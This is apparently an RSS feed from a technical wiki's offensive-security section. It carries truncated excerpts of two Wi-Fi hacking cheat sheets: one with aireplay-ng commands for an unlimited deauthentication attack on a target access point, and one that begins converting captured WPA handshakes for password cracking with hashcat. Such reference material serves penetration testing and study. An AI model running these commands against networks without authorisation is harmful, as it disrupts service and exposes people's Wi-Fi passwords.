<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.8" -->
<?xml-stylesheet href="https://techdoku.nogafam.es/lib/exe/css.php?s=feed" type="text/css"?>
<rdf:RDF
    xmlns="http://purl.org/rss/1.0/"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel rdf:about="https://techdoku.nogafam.es/feed.php">
        <title>NoBIGTech Wiki Técnico - docu:csheet:ofsec:hack:wifi</title>
        <description></description>
        <link>https://techdoku.nogafam.es/</link>
        <image rdf:resource="https://techdoku.nogafam.es/lib/exe/fetch.php?media=wiki:dokuwiki.svg" />
       <dc:date>2026-05-04T14:02:05+00:00</dc:date>
        <items>
            <rdf:Seq>
                <rdf:li rdf:resource="https://techdoku.nogafam.es/doku.php?id=docu:csheet:ofsec:hack:wifi:aireplay&amp;rev=1581196822&amp;do=diff"/>
                <rdf:li rdf:resource="https://techdoku.nogafam.es/doku.php?id=docu:csheet:ofsec:hack:wifi:hashcat&amp;rev=1581370347&amp;do=diff"/>
            </rdf:Seq>
        </items>
    </channel>
    <image rdf:about="https://techdoku.nogafam.es/lib/exe/fetch.php?media=wiki:dokuwiki.svg">
        <title>NoBIGTech Wiki Técnico</title>
        <link>https://techdoku.nogafam.es/</link>
        <url>https://techdoku.nogafam.es/lib/exe/fetch.php?media=wiki:dokuwiki.svg</url>
    </image>
    <item rdf:about="https://techdoku.nogafam.es/doku.php?id=docu:csheet:ofsec:hack:wifi:aireplay&amp;rev=1581196822&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-02-08T21:20:22+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>aireplay</title>
        <link>https://techdoku.nogafam.es/doku.php?id=docu:csheet:ofsec:hack:wifi:aireplay&amp;rev=1581196822&amp;do=diff</link>
        <description>aireplay-ng deauthentications and replays

Capture AP information

airodump-ng -i wlan0mon

Change interface channel

iwconfig wlan0mon channel [CHANNEL_NUM]

Launch deauth attacks


# --deauth or -0 | works the same
# --deauth #     | number of deauthentications (0 to infinite)
# -a MAC         | mac address of the target Access Point BSSID
# -c MAC         | mac address of the client associated to target
aireplay-ng --deauth 0 -a [TARGET_BSSID] wlan0mon
aireplay-ng --deauth 0 -a [TARGET_BSSID]…</description>
    </item>
    <item rdf:about="https://techdoku.nogafam.es/doku.php?id=docu:csheet:ofsec:hack:wifi:hashcat&amp;rev=1581370347&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-02-10T21:32:27+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>hashcat</title>
        <link>https://techdoku.nogafam.es/doku.php?id=docu:csheet:ofsec:hack:wifi:hashcat&amp;rev=1581370347&amp;do=diff</link>
        <description>Cracking WPA handshakes with hashcat



This is a little cheat sheet of the tools and commands needed

to crack WPA handshakes and get plain text passwords out of them.




Convert .cap files into .hccapx files (new format for hashcat)


git clone https://github.com/hashcat/hashcat-utils.git
cd hashcat-utils/src
make
./cap2hccapx.bin THEWIFITOCRACK.cap THEWIFITOCRACK.hccapx</description>
    </item>
</rdf:RDF>
